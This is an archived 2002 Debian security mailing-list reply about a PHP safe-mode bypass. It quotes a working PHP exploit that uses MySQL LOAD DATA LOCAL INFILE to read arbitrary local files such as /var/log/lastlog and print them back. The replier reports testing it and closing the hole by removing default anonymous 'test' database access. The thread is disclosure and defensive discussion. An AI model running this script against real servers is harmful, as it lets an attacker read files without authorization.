Re: SECURITY HOLE in MySQL module in PHP

To: debian-security@lists.debian.org
Subject: Re: SECURITY HOLE in MySQL module in PHP
From: brendan hack <bendy@bendys.com>
Date: Thu, 07 Feb 2002 09:44:23 +1100
Message-id: <[🔎] 3C61B1C7.8020805@bendys.com>
References: <[🔎] Pine.LNX.4.33.0202062159470.24262-100000@aurora.nsu.ru>

I just tested this out on a php/mysql system which we just setup atwork. It still had the 'test' database and the anonymous user access for'test' that comes with the default mysql setup. The first time I triedit I received an error saying 'test_database' not found. I changed $dbfrom 'test_database' to 'test' and the exploit then worked. I thenremoved all access privileges from the anonymous user to the testdatabase and received the following:


FAILED: USE test
REASON: Access denied for user: '@localhost' to database 'test'

Seems to me this is just a problem with admins not removing the defaulttest setup from mysql. Can anyone with more experience in php/mysqlverify this or explain what simple fact I'm overlooking? I've only beendoing php/mysql for a few days so I'm not an expert.


cheers

brendan hack

ps: test database is gone now!

Dmitry N. Hramtsov wrote:

Hello!

You can read it in details at:
http://bugs.php.net/bug.php?id=15375

or at:
http://www.security.nnov.ru/search/document.asp?docid=2444

Short exploit:

<?

/*
   PHP Safe Mode Problem

   This script will connect to a database server running locally or otherwise,
   create a temporary table with one column, use the LOAD DATA statement to
   read a (possibly binary) file, then reads it back to the client.

   Any type of file may pass through this 'proxy'. Although unrelated, this
   may also be used to access files on the DB server (although they must be
   world-readable or in MySQLd's basedir, according to docs).
*/


$host = 'localhost';
$user = 'root';
$pass = 'letmein';
$db   = 'test_database';

$filename = '/var/log/lastlog';     /* File to grab from [local] server */
$local = true;                      /* Read from local filesystem */


$local = $local ? 'LOCAL' : '';

$sql = array (
   "USE $db",

   'CREATE TEMPORARY TABLE ' . ($tbl = 'A'.time ()) . ' (a LONGBLOB)',

   "LOAD DATA $local INFILE '$filename' INTO TABLE $tbl FIELDS "
   . "TERMINATED BY       '__THIS_NEVER_HAPPENS__' "
   . "ESCAPED BY          '' "
   . "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'",

   "SELECT a FROM $tbl LIMIT 1"
);

Header ('Content-type: text/plain');

mysql_connect ($host, $user, $pass);

foreach ($sql as $statement) {
   $q = mysql_query ($statement);

   if ($q == false) die (
      "FAILED: " . $statement . "\n" .
      "REASON: " . mysql_error () . "\n"
   );

   if (! $r = @mysql_fetch_array ($q, MYSQL_NUM)) continue;

   echo $r [0];
   mysql_free_result ($q);
}

?>

Any comments or counsel?

Maybe debian developers should make a "quick and dirty" fix for this,
because (as I can understand) php developers already knows about this
hole and do still nothing.

Best regards,
Dmitry N. Hramtsov



--
http://www.bendys.com
bendy@bendys.com

Real coders celebrate Christmas at Halloween.
---------------------------------------------
Prototype replacement signature, let me know what you think:
If you're not part of the solution, you're part of the precipitate

Reply to:

Follow-Ups:
- Re: SECURITY HOLE in MySQL module in PHP
  - From: Ralf Dreibrodt <ralf@dreibrodt.de>

References:
- SECURITY HOLE in MySQL module in PHP
  - From: "Dmitry N. Hramtsov" <hdn@nsu.ru>

Prev by Date: Re: [d-security] Re: SECURITY HOLE in MySQL module in PHP
Next by Date: Re: SECURITY HOLE in MySQL module in PHP
Previous by thread: Re: [d-security] Re: SECURITY HOLE in MySQL module in PHP
Next by thread: Re: SECURITY HOLE in MySQL module in PHP
Index(es):
- Date
- Thread